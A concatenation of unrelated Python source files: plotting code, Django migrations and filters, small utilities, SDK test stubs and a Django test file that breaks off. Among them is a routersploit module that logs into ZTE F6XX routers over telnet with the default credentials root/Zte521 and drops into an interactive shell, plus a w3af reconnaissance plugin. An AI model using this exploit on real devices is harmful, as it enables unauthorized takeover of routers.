# naming the x axis
plt.xlabel('Number of Exponentiations (log scale)')
# naming the y axis
plt.ylabel('Time (s x 1000) ')
# giving a title to my graph
plt.title('VDF Setup Time')
# show a legend on the plot
plt.legend()
# function to show the plot
plt.show()
# ## Evaluation Time
# In[17]:
def Eval_Time_Plot(Time, dhvdf_1_et, dhvdf_2_et, wesvdf_et, pievdf_et):
for i in range(len(dhvdf_1_et)):
# plotting the points of Proposed VDF-1
plt.plot(Time, dhvdf_1_et[i], label = "Proposed VDF-1", color='green', linestyle='solid', linewidth = 1,
marker='.', markerfacecolor='green', markersize=12)
# plotting the points of Proposed VDF-2
plt.plot(Time, dhvdf_2_et[i], label = "Proposed VDF-2", color='blue', linestyle='solid', linewidth = 1,
marker='.', markerfacecolor='blue', markersize=12)
# plotting the points of Proposed Wesoloski's VDF
plt.plot(Time, wesvdf_et[i], label = "Wesoloski VDF", color='orange', linestyle='solid', linewidth = 1,
marker='.', markerfacecolor='orange', markersize=12)
# plotting the points of Proposed Pietrzak's VDF
plt.plot(Time, pievdf_et[i], label = "Pietrzak VDF", color='red', linestyle='solid', linewidth = 1,
marker='.', markerfacecolor='red', markersize=12)
# setting x and y axis range
# plt.ylim(1,10)
# plt.xlim(10, 15)
# naming the x axis
plt.xlabel('Number of Exponentiations (log scale)')
# naming the y axis
plt.ylabel('Time (s x 1000) ')
# giving a title to my graph
plt.title('VDF Evaluation Time')
# show a legend on the plot
plt.legend()
# function to show the plot
plt.show()
# ## Proof Generation Time
# In[18]:
def Proof_Time_Plot(Time, dhvdf_1_pt, dhvdf_2_pt, wesvdf_pt, pievdf_pt):
for i in range(len(dhvdf_1_pt)):
# plotting the points of Proposed VDF-1
plt.plot(Time, dhvdf_1_pt[i], label = "Proposed VDF-1", color='green', linestyle='solid', linewidth = 1,
marker='.', markerfacecolor='green', markersize=12)
# plotting the points of Proposed VDF-2
plt.plot(Time, dhvdf_2_pt[i], label = "Proposed VDF-2", color='blue', linestyle='solid', linewidth = 1,
marker='.', markerfacecolor='blue', markersize=12)
# plotting the points of Proposed Wesoloski's VDF
plt.plot(Time, wesvdf_pt[i], label = "Wesoloski VDF", color='orange', linestyle='solid', linewidth = 1,
marker='.', markerfacecolor='orange', markersize=12)
# plotting the points of Proposed Pietrzak's VDF
plt.plot(Time, pievdf_pt[i], label = "Pietrzak VDF", color='red', linestyle='solid', linewidth = 1,
marker='.', markerfacecolor='red', markersize=12)
# setting x and y axis range
# plt.ylim(1,10)
# plt.xlim(10, 15)
# naming the x axis
plt.xlabel('Number of Exponentiations (log scale)')
# naming the y axis
plt.ylabel('Time (s x 1000) ')
# giving a title to my graph
plt.title('VDF Proof Generation Time')
# show a legend on the plot
plt.legend()
# function to show the plot
plt.show()
# ## Verification Time
# In[19]:
def Verification_Time_Plot(Time, dhvdf_1_vt, dhvdf_2_vt, wesvdf_vt, pievdf_vt):
for i in range(len(dhvdf_1_vt)):
# plotting the points of Proposed VDF-1
plt.plot(Time, dhvdf_1_vt[i], label = "Proposed VDF-1", color='green', linestyle='solid', linewidth = 1,
marker='.', markerfacecolor='green', markersize=12)
# plotting the points of Proposed VDF-2
plt.plot(Time, dhvdf_2_vt[i], label = "Proposed VDF-2", color='blue', linestyle='solid', linewidth = 1,
marker='.', markerfacecolor='blue', markersize=12)
# plotting the points of Proposed Wesoloski's VDF
plt.plot(Time, wesvdf_vt[i], label = "Wesoloski VDF", color='orange', linestyle='solid', linewidth = 1,
marker='.', markerfacecolor='orange', markersize=12)
# plotting the points of Proposed Pietrzak's VDF
plt.plot(Time, pievdf_vt[i], label = "Pietrzak VDF", color='red', linestyle='solid', linewidth = 1,
marker='.', markerfacecolor='red', markersize=12)
# setting x and y axis range
# plt.ylim(1,10)
# plt.xlim(10, 15)
# naming the x axis
plt.xlabel('Number of Exponentiations (log scale)')
# naming the y axis
plt.ylabel('Time (s x 1000) ')
# giving a title to my graph
plt.title('VDF Verification Time')
# show a legend on the plot
plt.legend()
# function to show the plot
plt.show()
# # Main Function
# In[ ]:
if __name__=="__main__":
dhvdf_1_st = []
dhvdf_1_et = []
dhvdf_1_pt = []
dhvdf_1_vt = []
dhvdf_2_st = []
dhvdf_2_et = []
dhvdf_2_pt = []
dhvdf_2_vt = []
wesvdf_st = []
wesvdf_et = []
wesvdf_pt = []
wesvdf_vt = []
pievdf_st = []
pievdf_et = []
pievdf_pt = []
pievdf_vt = []
for i in range(5, 6): # Lambda = 512, 1024, 2048
Lambda = 2**i
dhvdf1st = []
dhvdf1et = []
dhvdf1pt = []
dhvdf1vt = []
dhvdf2st = []
dhvdf2et = []
dhvdf2pt = []
dhvdf2vt = []
wesvdfst = []
wesvdfet = []
wesvdfpt = []
wesvdfvt = []
pievdfst = []
pievdfet = []
pievdfpt = []
pievdfvt = []
Time = []
for j in range (14, 21): # T = 2^14, 2^15, 2^16, 2^17, 2^18, 2^19, 2^20
N, x, xcap, T, Tcap, Gamma, st_1, st_2, st_3 = Setup(Lambda, j)
# print("The value of N:", N)
# print("The Value of x:", x)
# print("The Value of xcap:", xcap)
# print("The Value of T:", T)
Time.append(j)
print("\nRound --> ", i, j)
print("\n ------- Efficient and Tight Verifiable Delay Function -- 1 -------\n")
et, vt = DH_Main_1(Lambda, N, x, xcap, T, Tcap)
dhvdf1st.append(st_1)
dhvdf1et.append(et)
dhvdf1pt.append(0)
dhvdf1vt.append(vt)
print("\n ------- Efficient and Tight Verifiable Delay Function -- 2 -------\n")
et, vt = DH_Main_2(Lambda, N, x, T, Gamma)
dhvdf2st.append(st_2)
dhvdf2et.append(et)
dhvdf2pt.append(0)
dhvdf2vt.append(vt)
print("\n ------- Wesoloski's Verifiable Delay Function (Efficient VDF) -------\n")
et, pt, vt = Wes_Main(Lambda, N, x, T)
wesvdfst.append(st_3)
wesvdfet.append(et)
wesvdfpt.append(pt)
wesvdfvt.append(vt)
print("\n ------- Pietrzak's Verifiable Delay Function (Simple VDF) -------\n")
et, pt, vt = Pie_Main(Lambda, N, x, T)
pievdfst.append(st_3)
pievdfet.append(et)
pievdfpt.append(pt)
pievdfvt.append(vt)
dhvdf_1_st.append(dhvdf1st)
dhvdf_1_et.append(dhvdf1et)
dhvdf_1_pt.append(dhvdf1pt)
dhvdf_1_vt.append(dhvdf1vt)
dhvdf_2_st.append(dhvdf2st)
dhvdf_2_et.append(dhvdf2et)
dhvdf_2_pt.append(dhvdf2pt)
dhvdf_2_vt.append(dhvdf2vt)
wesvdf_st.append(wesvdfst)
wesvdf_et.append(wesvdfet)
wesvdf_pt.append(wesvdfpt)
wesvdf_vt.append(wesvdfvt)
pievdf_st.append(pievdfst)
pievdf_et.append(pievdfet)
pievdf_pt.append(pievdfpt)
pievdf_vt.append(pievdfvt)
print("\n ------- VDF Setup Time Graphs -------\n")
Setup_Time_Plot(Time, dhvdf_1_st, dhvdf_2_st, wesvdf_st, pievdf_st)
print("\n ------- VDF Evaluation Time Graphs -------\n")
Eval_Time_Plot(Time, dhvdf_1_et, dhvdf_2_et, wesvdf_et, pievdf_et)
print("\n ------- VDF Proof Generation Time Graphs -------\n")
Proof_Time_Plot(Time, dhvdf_1_pt, dhvdf_2_pt, wesvdf_pt, pievdf_pt)
print("\n ------- VDF Verification Time Graphs -------\n")
Verification_Time_Plot(Time, dhvdf_1_vt, dhvdf_2_vt, wesvdf_vt, pievdf_vt)
|
# Generated by Django 3.1 on 2020-09-09 00:28
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('resources', '0003_auto_20200819_1748'),
]
operations = [
migrations.AddField(
model_name='job',
name='description',
field=models.CharField(default='', max_length=512),
preserve_default=False,
),
migrations.AddField(
model_name='job',
name='name',
field=models.CharField(default='', max_length=128),
preserve_default=False,
),
migrations.AlterField(
model_name='host',
name='description',
field=models.CharField(max_length=512),
),
migrations.AlterField(
model_name='hostgroup',
name='description',
field=models.CharField(max_length=512),
),
migrations.AlterField(
model_name='jobgroup',
name='description',
field=models.CharField(max_length=512),
),
]
|
from fabric.api import local
from jinja2 import Environment, FileSystemLoader
template_env = Environment(loader=FileSystemLoader('.'))
def build():
#template = template_env.get_template('source/index.html')
# Template to generate the presentation
template = template_env.get_template('mobile_test_automation_source/index.html')
rendered_template = template.render()
#with open('presentation/index.html', 'wb') as fh:
# fh.write(rendered_template)
# the actual presentation
with open('mobile_test_automation_presentation/index.html', 'wb') as fh:
fh.write(rendered_template)
def publish():
build()
#local('ghp-import -p presentation')
local('ghp-import -p mobile_test_automation_presentation')
|
# -*- coding: utf-8 -*-
"""
convert from 16bit tiff to 16bit png.
======================================
"""
# import standard libraries
import os
# import third-party libraries
import numpy as np
import cv2
# import my libraries
# information
__author__ = 'Toru Yoshihara'
__copyright__ = 'Copyright (C) 2020 - Toru Yoshihara'
__license__ = 'New BSD License - https://opensource.org/licenses/BSD-3-Clause'
__maintainer__ = 'Toru Yoshihara'
__email__ = 'toru.ver.11 at-sign gmail.com'
__all__ = []
if __name__ == '__main__':
src_name_list = [
"./img/test_natual_image_hdr10_umi.tif"]
dst_name_list = [
"./img/test_natual_image_hdr10_umi.png"]
for src, dst in zip(src_name_list, dst_name_list):
img = cv2.imread(src, cv2.IMREAD_ANYDEPTH | cv2.IMREAD_COLOR)
cv2.imwrite(dst, img)
|
from django_filters import rest_framework as filter
from .models import Usuario, Classificacao, LogAutenticacao
from empresa.filters import lookup_types_empresa
lookup_types_usuario = {
'uuid': ['exact', 'in', ],
#'codigo': ['exact', 'contains', 'gt', 'gte', 'lt', 'lte', 'in', 'range'],
'username': ['exact', 'iexact', 'icontains', 'istartswith', 'iendswith', 'in', 'iregex', ],
'first_name': ['exact', 'iexact', 'icontains', 'istartswith', 'iendswith', 'in', 'iregex', ],
'last_name': ['exact', 'iexact', 'icontains', 'istartswith', 'iendswith', 'in', 'iregex', ],
'email': ['exact', 'iexact', 'icontains', 'istartswith', 'iendswith', 'in', 'iregex', ],
'telefone': ['exact', 'iexact', 'icontains', 'istartswith', 'iendswith', 'in', 'iregex', ],
'celular': ['exact', 'iexact', 'icontains', 'istartswith', 'iendswith', 'in', 'iregex', ],
'classificacao': ['exact', ],
'observacoes': ['exact', 'iexact', 'icontains', 'istartswith', 'iendswith', 'in', 'iregex', ],
'media_avaliacoes': ['exact', 'contains', 'gt', 'gte', 'lt', 'lte', 'in', 'range'],
'empresa': ['exact', ],
'last_login': ['exact', ],
'is_staff': ['exact', ],
'is_manager': ['exact', ],
'is_superuser': ['exact', ],
'is_active': ['exact', ],
'groups': [],
}
lookup_types_classificacao = {
'uuid': ['exact', 'in', ],
'codigo': ['exact', 'iexact', 'icontains', 'istartswith', 'iendswith', 'in', 'iregex', ],
'nome': ['exact', 'iexact', 'icontains', 'istartswith', 'iendswith', 'in', 'iregex', ],
'descricao': ['exact', 'iexact', 'icontains', 'istartswith', 'iendswith', 'in', 'iregex', ],
}
lookup_types_log_autenticacao = {
'ip': ['exact', 'iexact', 'icontains', 'istartswith', 'iendswith', 'in', 'iregex', ],
'autenticado': ['exact', ],
'data_autenticacao': [
'exact',
'range',
'year', 'year__gte', 'year__gt', 'year__lte', 'year__lt', 'year__range', 'year__in',
'month', 'month__gte', 'month__gt', 'month__lte', 'month__lt', 'month__range', 'month__in',
'day', 'day__gte', 'day__gt', 'day__lte', 'day__lt', 'day__range', 'day__in',
'gte',
'gt',
'lte',
'lt',
'in',
],
'hora_autenticacao': [
'exact',
'range',
'hour', 'hour__gte', 'hour__gt', 'hour__lte', 'hour__lt', 'hour__range', 'hour__in',
'minute', 'minute__gte', 'minute__gt', 'minute__lte', 'minute__lt', 'minute__range', 'minute__in',
'second', 'second__gte', 'second__gt', 'second__lte', 'second__lt', 'second__range', 'second__in',
'gte',
'gt',
'lte',
'lt',
'in',
],
'usuario': ['exact', ],
}
class UsuarioFilter(filter.FilterSet):
class Meta:
model = Usuario
fields = {
'uuid': lookup_types_usuario['uuid'],
#'codigo': lookup_types_usuario['codigo'],
'username': lookup_types_usuario['username'],
'first_name': lookup_types_usuario['first_name'],
'last_name': lookup_types_usuario['last_name'],
'email': lookup_types_usuario['email'],
'telefone': lookup_types_usuario['telefone'],
'celular': lookup_types_usuario['celular'],
'classificacao': lookup_types_classificacao['classificacao'],
'classificacao__codigo': lookup_types_classificacao['codigo'],
'classificacao__nome': lookup_types_classificacao['nome'],
'classificacao__descricao': lookup_types_classificacao['descricao'],
'observacoes': lookup_types_usuario['observacoes'],
'media_avaliacoes': lookup_types_usuario['media_avaliacoes'],
'empresa': lookup_types_usuario['empresa'],
'empresa__cpf_cnpj': lookup_types_empresa['cpf_cnpj'],
'empresa__razao_social': lookup_types_empresa['razao_social'],
'empresa__nome_fantasia': lookup_types_empresa['nome_fantasia'],
'empresa__logradouro': lookup_types_empresa['logradouro'],
'empresa__numero': lookup_types_empresa['numero'],
'empresa__complemento': lookup_types_empresa['complemento'],
'empresa__bairro': lookup_types_empresa['bairro'],
'empresa__municipio': lookup_types_empresa['municipio'],
'empresa__uf': lookup_types_empresa['uf'],
'empresa__cep': lookup_types_empresa['cep'],
'empresa__pais': lookup_types_empresa['pais'],
'empresa__telefone': lookup_types_empresa['telefone'],
'empresa__media_avaliacoes': lookup_types_empresa['media_avaliacoes'],
'empresa__prestadora_servico': lookup_types_empresa['prestadora_servico'],
'empresa__ativo': lookup_types_empresa['ativo'],
'last_login': lookup_types_usuario['last_login'],
'is_staff': lookup_types_usuario['is_staff'],
'is_manager': lookup_types_usuario['is_manager'],
'is_superuser': lookup_types_usuario['is_superuser'],
'is_active': lookup_types_usuario['is_active'],
'groups': lookup_types_usuario['groups'],
}
class ClassificacaoFilter(filter.FilterSet):
class Meta:
model = Classificacao
fields = {
'uuid': lookup_types_classificacao['uuid'],
'codigo': lookup_types_classificacao['codigo'],
'nome': lookup_types_classificacao['nome'],
'descricao': lookup_types_classificacao['descricao'],
}
class LogAutenticacaoFilter(filter.FilterSet):
class Meta:
model = LogAutenticacao
fields = {
'ip': lookup_types_log_autenticacao['ip'],
'autenticado': lookup_types_log_autenticacao['autenticado'],
'data_autenticacao': lookup_types_log_autenticacao['data_autenticacao'],
'hora_autenticacao': lookup_types_log_autenticacao['hora_autenticacao'],
'usuario': lookup_types_log_autenticacao['usuario'],
#'usuario__codigo': lookup_types_usuario['codigo'],
'usuario__username': lookup_types_usuario['username'],
'usuario__first_name': lookup_types_usuario['first_name'],
'usuario__last_name': lookup_types_usuario['last_name'],
'usuario__email': lookup_types_usuario['email'],
'usuario__telefone': lookup_types_usuario['telefone'],
'usuario__celular': lookup_types_usuario['celular'],
'usuario__classificacao': lookup_types_classificacao['classificacao'],
'usuario__classificacao__codigo': lookup_types_classificacao['codigo'],
'usuario__classificacao__nome': lookup_types_classificacao['nome'],
'usuario__classificacao__descricao': lookup_types_classificacao['descricao'],
'usuario__observacoes': lookup_types_usuario['observacoes'],
'usuario__media_avaliacoes': lookup_types_usuario['media_avaliacoes'],
'usuario__empresa': lookup_types_usuario['empresa'],
'usuario__empresa__cpf_cnpj': lookup_types_empresa['cpf_cnpj'],
'usuario__empresa__razao_social': lookup_types_empresa['razao_social'],
'usuario__empresa__nome_fantasia': lookup_types_empresa['nome_fantasia'],
'usuario__empresa__logradouro': lookup_types_empresa['logradouro'],
'usuario__empresa__numero': lookup_types_empresa['numero'],
'usuario__empresa__complemento': lookup_types_empresa['complemento'],
'usuario__empresa__bairro': lookup_types_empresa['bairro'],
'usuario__empresa__municipio': lookup_types_empresa['municipio'],
'usuario__empresa__uf': lookup_types_empresa['uf'],
'usuario__empresa__cep': lookup_types_empresa['cep'],
'usuario__empresa__pais': lookup_types_empresa['pais'],
'usuario__empresa__telefone': lookup_types_empresa['telefone'],
'usuario__empresa__media_avaliacoes': lookup_types_empresa['media_avaliacoes'],
'usuario__empresa__prestadora_servico': lookup_types_empresa['prestadora_servico'],
'usuario__empresa__ativo': lookup_types_empresa['ativo'],
'usuario__last_login': lookup_types_usuario['last_login'],
'usuario__is_staff': lookup_types_usuario['is_staff'],
'usuario__is_manager': lookup_types_usuario['is_manager'],
'usuario__is_superuser': lookup_types_usuario['is_superuser'],
'usuario__is_active': lookup_types_usuario['is_active'],
'usuario__groups': lookup_types_usuario['groups'],
}
|
from scipy.io import wavfile
import soundfile as sf
from pesq import pesq
def cal_pesq(f1,f2):
ref,rate = sf.read(f1)
deg,rate = sf.read(f2)
print(f1,f2)
print('wb', pesq(rate, ref, deg, 'wb'))
print('nb', pesq(rate, ref, deg, 'nb'))
cal_pesq('./nearspeech.wav', './output.wav')
cal_pesq('./nearspeech.wav', './rec.wav')
|
import telnetlib
from routersploit import (
exploits,
print_status,
print_success,
print_error,
mute,
validators,
)
class Exploit(exploits.Exploit):
"""
Exploit implementation for ZTE F6XX default root password.
If the target is vulnerable it is possible to authenticate to the device"
"""
__info__ = {
'name': 'ZTE F6XX Default root',
'description': 'Module exploits ZTE F6XX default root password. If the target is possible to authentiate to the device.',
'authors': [
'devilscream', # vulnerability discovery & routersploit module
],
'references': [
'http://www.ironbugs.com/2016/02/hack-and-patch-your-zte-f660-routers.html',
],
'devices': [
'ZTE ZXA10 F660',
'ZTE ZXA10 F609',
'ZTE ZXA10 F620',
]
}
target = exploits.Option('', 'Target address e.g. 192.168.1.1', validators=validators.ipv4) # target address
telnet_port = exploits.Option(23, 'Target Telnet port', validators=validators.integer) # target telnet port
username = exploits.Option("root", "Username to authenticate with") # telnet username, default root
password = exploits.Option("Zte521", "Password to authenticate with") # telnet password, default Zte521
def run(self):
try:
print_status("Trying to authenticate to the telnet server")
tn = telnetlib.Telnet(self.target, self.telnet_port, timeout=10)
tn.expect(["Login: ", "login: "], 5)
tn.write(self.username + "\r\n")
tn.expect(["Password: ", "password"], 5)
tn.write(self.password + "\r\n")
tn.write("\r\n")
(i, obj, res) = tn.expect(["Incorrect", "incorrect"], 5)
if i != -1:
print_error("Exploit failed")
else:
if any(map(lambda x: x in res, ["#", "$", ">"])):
print_success("Authentication successful")
tn.write("\r\n")
tn.interact()
else:
print_error("Exploit failed")
tn.close()
except Exception:
print_error("Connection error {}:{}".format(self.target, self.telnet_port))
@mute
def check(self):
try:
tn = telnetlib.Telnet(self.target, self.telnet_port, timeout=10)
tn.expect(["Login: ", "login: "], 5)
tn.write(self.username + "\r\n")
tn.expect(["Password: ", "password"], 5)
tn.write(self.password + "\r\n")
tn.write("\r\n")
(i, obj, res) = tn.expect(["Incorrect", "incorrect"], 5)
tn.close()
if i != -1:
return False # target is not vulnerable
else:
if any(map(lambda x: x in res, ["#", "$", ">"])):
return True # target is vulnerable
except Exception:
return False # target is not vulnerable
return False # target is not vulnerable
|
"""
server_status.py
Copyright 2006 Andres Riancho
This file is part of w3af, http://w3af.org/ .
w3af is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation version 2 of the License.
w3af is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with w3af; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
"""
import re
import w3af.core.controllers.output_manager as om
import w3af.core.data.kb.knowledge_base as kb
import w3af.core.data.constants.severity as severity
from w3af.core.controllers.plugins.infrastructure_plugin import InfrastructurePlugin
from w3af.core.controllers.core_helpers.fingerprint_404 import is_404
from w3af.core.controllers.exceptions import RunOnce
from w3af.core.controllers.misc.decorators import runonce
from w3af.core.data.parsers.doc.url import URL
from w3af.core.data.kb.vuln import Vuln
from w3af.core.data.kb.info import Info
from w3af.core.data.request.fuzzable_request import FuzzableRequest
class server_status(InfrastructurePlugin):
"""
Find new URLs from the Apache server-status cgi.
:author: Andres Riancho (andres.riancho@gmail.com)
"""
def __init__(self):
InfrastructurePlugin.__init__(self)
# Internal variables
self._shared_hosting_hosts = []
@runonce(exc_class=RunOnce)
def discover(self, fuzzable_request, debugging_id):
"""
Get the server-status and parse it.
:param debugging_id: A unique identifier for this call to discover()
:param fuzzable_request: A fuzzable_request instance that contains
(among other things) the URL to test.
"""
base_url = fuzzable_request.get_url().base_url()
server_status_url = base_url.url_join('server-status')
response = self._uri_opener.GET(server_status_url, cache=True)
if not is_404(response) and response.get_code() not in range(400, 404):
if 'apache' in response.get_body().lower():
msg = 'Apache server-status module is enabled and accessible.'
msg += ' The URL is: "%s"' % response.get_url()
om.out.information(msg)
self._extract_server_version(fuzzable_request, response)
self._extract_urls(fuzzable_request, response)
self._report_shared_hosting(fuzzable_request, response)
def _extract_server_version(self, fuzzable_request, response):
"""
Get the server version from the HTML:
<dl><dt>Server Version: Apache/2.2.9 (Unix)</dt>
"""
for version in re.findall('<dl><dt>Server Version: (.*?)</dt>',
response.get_body()):
# Save the results in the KB so the user can look at it
desc = 'The web server has the apache server status module'\
' enabled which discloses the following remote server'\
' version: "%s".'
desc %= version
i = Info('Apache Server version', desc, response.id, self.get_name())
i.set_url(response.get_url())
om.out.information(i.get_desc())
kb.kb.append(self, 'server', i)
def _extract_urls(self, fuzzable_request, response):
"""
Extract information from the server-status page and send FuzzableRequest
instances to the core.
"""
self.output_queue.put(FuzzableRequest(response.get_url()))
# Now really parse the file and create custom made fuzzable requests
regex = '<td>.*?<td nowrap>(.*?)</td><td nowrap>.*? (.*?) HTTP/1'
for domain, path in re.findall(regex, response.get_body()):
if 'unavailable' in domain:
domain = response.get_url().get_domain()
# Check if the requested domain and the found one are equal.
if domain == response.get_url().get_domain():
proto = response.get_url().get_protocol()
found_url = proto + '://' + domain + path
found_url = URL(found_url)
# They are equal, request the URL and create the fuzzable
# requests
tmp_res = self._uri_opener.GET(found_url, cache=True)
if not is_404(tmp_res):
self.output_queue.put(FuzzableRequest(found_url))
else:
# This is a shared hosting server
self._shared_hosting_hosts.append(domain)
def _report_shared_hosting(self, fuzzable_request, response):
# Now that we are outsite the for loop, we can report the possible vulns
if len(self._shared_hosting_hosts):
desc = 'The web application under test seems to be in a shared'\
' hosting.'
v = Vuln.from_fr('Shared hosting', desc, severity.MEDIUM,
response.id, self.get_name(), fuzzable_request)
self._shared_hosting_hosts = list(set(self._shared_hosting_hosts))
v['also_in_hosting'] = self._shared_hosting_hosts
kb.kb.append(self, 'shared_hosting', v)
om.out.vulnerability(v.get_desc(), severity=v.get_severity())
msg = 'This list of domains, and the domain of the web application'\
' under test, all point to the same server:'
om.out.vulnerability(msg, severity=v.get_severity())
for url in self._shared_hosting_hosts:
om.out.vulnerability('- ' + url, severity=severity.MEDIUM)
def get_long_desc(self):
"""
:return: A DETAILED description of the plugin functions and features.
"""
return """
This plugin fetches the server-status file used by Apache, and parses it.
After parsing, new URLs are found, and in some cases, the plugin can deduce
the existence of other domains hosted on the same server.
"""
|
#!/usr/bin/env python3
from sys import argv
from math import cos, sin
from math import radians as toR
data = [x.strip() for x in open(argv[1]).readlines()]
x = 0
y = 0
wp = [10, 1] # x, y / EW, NS
for s in data:
dir = s[0]
amnt = int(s[1:])
if dir == "N":
wp[1] += amnt
elif dir == "E":
wp[0] += amnt
elif dir == "S":
wp[1] -= amnt
elif dir == "W":
wp[0] -= amnt
elif dir == "R":
# P2.x = P.x * cos(R) - P.y * sin(R)
# P2.y = P.x * sin(R) + P.y * cos(R)
x2 = (wp[0] * cos(-1 * toR(amnt))) - (wp[1] * sin(-1 * toR(amnt)))
y2 = (wp[0] * sin(-1 * toR(amnt))) + (wp[1] * cos(-1 * toR(amnt)))
wp[0] = x2
wp[1] = y2
elif dir == "L":
x2 = (wp[0] * cos(toR(amnt))) - (wp[1] * sin(toR(amnt)))
y2 = (wp[0] * sin(toR(amnt))) + (wp[1] * cos(toR(amnt)))
wp[0] = x2
wp[1] = y2
elif dir == "F":
x += wp[0] * amnt
y += wp[1] * amnt
manhattan = abs(x) + abs(y)
print(f"{manhattan:.0f}")
|
# coding: utf-8
"""
Isilon SDK
Isilon SDK - Language bindings for the OneFS API # noqa: E501
OpenAPI spec version: 3
Contact: sdk@isilon.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import isi_sdk_8_0
from isi_sdk_8_0.api.upgrade_api import UpgradeApi # noqa: E501
from isi_sdk_8_0.rest import ApiException
class TestUpgradeApi(unittest.TestCase):
"""UpgradeApi unit test stubs"""
def setUp(self):
self.api = isi_sdk_8_0.api.upgrade_api.UpgradeApi() # noqa: E501
def tearDown(self):
pass
def test_create_cluster_add_remaining_node(self):
"""Test case for create_cluster_add_remaining_node
"""
pass
def test_create_cluster_archive_item(self):
"""Test case for create_cluster_archive_item
"""
pass
def test_create_cluster_assess_item(self):
"""Test case for create_cluster_assess_item
"""
pass
def test_create_cluster_commit_item(self):
"""Test case for create_cluster_commit_item
"""
pass
def test_create_cluster_firmware_assess_item(self):
"""Test case for create_cluster_firmware_assess_item
"""
pass
def test_create_cluster_firmware_upgrade_item(self):
"""Test case for create_cluster_firmware_upgrade_item
"""
pass
def test_create_cluster_patch_abort_item(self):
"""Test case for create_cluster_patch_abort_item
"""
pass
def test_create_cluster_patch_patch(self):
"""Test case for create_cluster_patch_patch
"""
pass
def test_create_cluster_retry_last_action_item(self):
"""Test case for create_cluster_retry_last_action_item
"""
pass
def test_create_cluster_rollback_item(self):
"""Test case for create_cluster_rollback_item
"""
pass
def test_create_cluster_upgrade_item(self):
"""Test case for create_cluster_upgrade_item
"""
pass
def test_delete_cluster_patch_patch(self):
"""Test case for delete_cluster_patch_patch
"""
pass
def test_get_cluster_firmware_progress(self):
"""Test case for get_cluster_firmware_progress
"""
pass
def test_get_cluster_firmware_status(self):
"""Test case for get_cluster_firmware_status
"""
pass
def test_get_cluster_node(self):
"""Test case for get_cluster_node
"""
pass
def test_get_cluster_nodes(self):
"""Test case for get_cluster_nodes
"""
pass
def test_get_cluster_patch_patch(self):
"""Test case for get_cluster_patch_patch
"""
pass
def test_get_upgrade_cluster(self):
"""Test case for get_upgrade_cluster
"""
pass
def test_list_cluster_patch_patches(self):
"""Test case for list_cluster_patch_patches
"""
pass
def test_update_cluster_upgrade(self):
"""Test case for update_cluster_upgrade
"""
pass
if __name__ == '__main__':
unittest.main()
|
import csv
import statistics
durations = []
with open('fast_a_better_vB_100.csv') as csv_file:
csv_reader = csv.reader(csv_file, delimiter=',')
with open('../api-tests/resources/bpmn/fast_a_better/fast_a_better_vB_100.json', 'w+') as txt_file:
txt_file.write("{\n")
txt_file.write('"durations": [\n')
for row in csv_reader:
durations.append(float(row[3]))
txt_file.write(str(row[3]) + ',\n')
txt_file.write('],\n')
txt_file.write('"interarrivalTime": ' + str(statistics.fmean(durations)) + '\n')
txt_file.write('}')
|
# Use modern Python
from __future__ import absolute_import, print_function, unicode_literals
# Django imports
from django.test import TestCase, SimpleTestCase
# External imports
from django_prbac.models import Grant, Role
# CCHQ imports
from corehq.apps.hqadmin.management.commands import cchq_prbac_bootstrap
from fab.pillow_settings import apply_pillow_actions_to_pillows, \
get_pillows_for_env, get_single_pillow_action
class TestCchqPrbacBootstrap(TestCase):
"""
Tests the PRBAC bootstrap with and without --dry-run
"""
def test_dry_run(self):
"""
When --dry-run is passed, no models should be created
"""
self.assertEquals(Role.objects.count(), 0)
self.assertEquals(Grant.objects.count(), 0)
command = cchq_prbac_bootstrap.Command()
command.handle(dry_run=True)
self.assertEquals(Role.objects.count(), 0)
self.assertEquals(Grant.objects.count(), 0)
def test_non_dry_run(self):
"""
When there is no --dry-run passed, it defaults to false, and
things happen. Furthermore, the thing should be idempotent
"""
self.assertEquals(Role.objects.count(), 0)
self.assertEquals(Grant.objects.count(), 0)
command = cchq_prbac_bootstrap.Command()
command.handle(dry_run=False)
# Just make sure something happened
self.assertGreater(Role.objects.count(), 10)
self.assertGreater(Grant.objects.count(), 10)
role_count = Role.objects.count()
grant_count = Grant.objects.count()
command.handle(dry_run=False)
self.assertEquals(Role.objects.count(), role_count)
self.assertEquals(Grant.objects.count(), grant_count)
class TestPillowTopFiltering(SimpleTestCase):
"""
Tests the function that excludes certain pillows from running on staging.
"""
def setUp(self):
self.pillowtops = {
'core': [
'corehq.pillows.case.CasePillow',
'corehq.pillows.xform.XFormPillow',
'corehq.pillows.domain.DomainPillow',
'corehq.pillows.user.UserPillow',
'corehq.pillows.application.AppPillow',
'corehq.pillows.group.GroupPillow',
'corehq.pillows.sms.SMSPillow',
'corehq.pillows.user.GroupToUserPillow',
'corehq.pillows.user.UnknownUsersPillow',
'corehq.pillows.sofabed.FormDataPillow',
'corehq.pillows.sofabed.CaseDataPillow',
],
'phonelog': [
'corehq.pillows.log.PhoneLogPillow',
],
}
def test_no_blacklist_items(self):
expected_pillows = {u'corehq.pillows.case.CasePillow',
u'corehq.pillows.xform.XFormPillow',
u'corehq.pillows.domain.DomainPillow',
u'corehq.pillows.user.UserPillow',
u'corehq.pillows.application.AppPillow',
u'corehq.pillows.group.GroupPillow',
u'corehq.pillows.sms.SMSPillow',
u'corehq.pillows.user.GroupToUserPillow',
u'corehq.pillows.user.UnknownUsersPillow',
u'corehq.pillows.sofabed.FormDataPillow',
u'corehq.pillows.sofabed.CaseDataPillow',
u'corehq.pillows.log.PhoneLogPillow'}
self.assertEqual(expected_pillows, apply_pillow_actions_to_pillows(
[], self.pillowtops))
def test_with_blacklist_items(self):
expected_pillows = {u'corehq.pillows.case.CasePillow',
u'corehq.pillows.xform.XFormPillow',
u'corehq.pillows.domain.DomainPillow',
u'corehq.pillows.user.UserPillow',
u'corehq.pillows.application.AppPillow',
u'corehq.pillows.group.GroupPillow',
u'corehq.pillows.sms.SMSPillow',
u'corehq.pillows.user.GroupToUserPillow',
u'corehq.pillows.user.UnknownUsersPillow',
u'corehq.pillows.sofabed.FormDataPillow',
